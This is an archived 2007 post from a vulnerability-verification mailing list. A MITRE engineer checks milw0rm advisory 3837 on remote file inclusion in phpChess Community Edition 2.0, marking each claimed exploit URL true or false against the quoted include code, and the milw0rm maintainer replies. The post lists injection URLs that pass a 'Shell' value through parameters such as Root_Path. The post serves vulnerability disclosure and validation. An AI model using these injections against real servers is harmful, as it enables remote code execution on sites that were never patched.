[VIM] Mostly True: phpChess Community Edition 2.0 RFI

str0ke str0ke at milw0rm.com
Mon May 7 16:02:33 UTC 2007


Removed the latter from 3837.

/str0ke

On 5/7/07, Heinbockel, Bill <heinbockel at mitre.org> wrote:
> MILW0RM:3837
> BID:23797
>
> # Exploit:[Path]/skins/phpchess/layout_admin_cfg.php?Root_Path=Shell
> TRUE: <?php
> include($Root_Path."skins/".$SkinName."/admin_header.php");?>
>
> # Exploit:[Path]/skins/phpchess/layout_cfg.php?Root_Path=Shell
> TRUE: <?php include($Root_Path."skins/".$SkinName."/header.php");?>
>
> # Exploit:[Path]/skins/phpchess/layout_t_top.php?Root_Path=Shell
> TRUE: <?php include($Root_Path."includes/cells/".$Contentpage);?>
>
> # Exploit:[Path]/includes/language.php?config=Shell
> FALSE: (included from a function definition called from outside of the
> file)
>         function GetStringFromStringTable($strTag, $config){
>
>                 include($config);
>                 ...
>
>
> William Heinbockel
> Infosec Engineer, Sr.
> The MITRE Corporation
> 202 Burlington Rd. MS S145
> Bedford, MA 01730
> heinbockel at mitre.org
> 781-271-2615
>


More information about the VIM mailing list